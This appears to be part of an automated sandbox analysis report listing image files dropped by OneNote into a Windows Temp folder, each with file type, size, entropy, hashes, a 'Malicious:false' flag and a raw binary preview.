                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{296D4924-A03A-4F76-BFBF-9A960E5F381A}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):39010
                                                                                                                                                                                                                  Entropy (8bit):7.362726513389497
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
                                                                                                                                                                                                                  MD5:9700DE02720CDB5A45EDE51F1A4647EC
                                                                                                                                                                                                                  SHA1:CF72A73E1181719B1CC45C2FE0A6B619081E115E
                                                                                                                                                                                                                  SHA-256:7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
                                                                                                                                                                                                                  SHA-512:5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......|]v....D..9.k.w.|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2AA34B7D-DFBA-41D8-AD1C-98BD5068625A}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2C15ECC5-F0A8-4C3F-A541-D38A55A90839}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):16003
                                                                                                                                                                                                                  Entropy (8bit):7.959532793770661
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                                  MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                                  SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                                  SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                                  SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2C5C27D7-B4AC-4246-85E7-ECD3B377E111}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):3879
                                                                                                                                                                                                                  Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                                  MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                                  SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                                  SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                                  SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2CDD4CA3-6EB0-42EB-B93D-7C02D919E325}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2D0852DA-B089-470F-8629-D5AAF0A83E21}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4081
                                                                                                                                                                                                                  Entropy (8bit):7.943373267196131
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                                  MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                                  SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                                  SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                                  SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2D0C3FCD-E484-4E3E-9162-0F9EC5EF3749}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4490
                                                                                                                                                                                                                  Entropy (8bit):7.928016176674318
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                                  MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                                  SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                                  SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                                  SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2D422CB1-F334-44F0-8858-90A9C6C0C6AE}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13030
                                                                                                                                                                                                                  Entropy (8bit):7.948664903731204
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                                                                                  MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                                                                                  SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                                                                                  SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                                                                                  SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2D6FBFA5-CE92-4F34-B3EA-15D6CA4C4C7A}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11449
                                                                                                                                                                                                                  Entropy (8bit):7.91552812501629
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                                  MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                                  SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                                  SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                                  SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2DBD263F-CBF4-472B-903B-7C780AB3CC56}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):65998
                                                                                                                                                                                                                  Entropy (8bit):7.671031449942883
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                                                                                                                                  MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                                                                                                                                  SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                                                                                                                                  SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                                                                                                                                  SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{2E3504EB-356A-46D7-9403-EFF6D7D64D37}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1657
                                                                                                                                                                                                                  Entropy (8bit):7.80882577056055
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                                  MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                                  SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                                  SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                                  SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{309DB5D0-DAB4-4D11-B65C-FEF247E94EBF}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13084
                                                                                                                                                                                                                  Entropy (8bit):7.940058639272698
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                                  MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                                  SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                                  SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                                  SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                                  Malicious:false
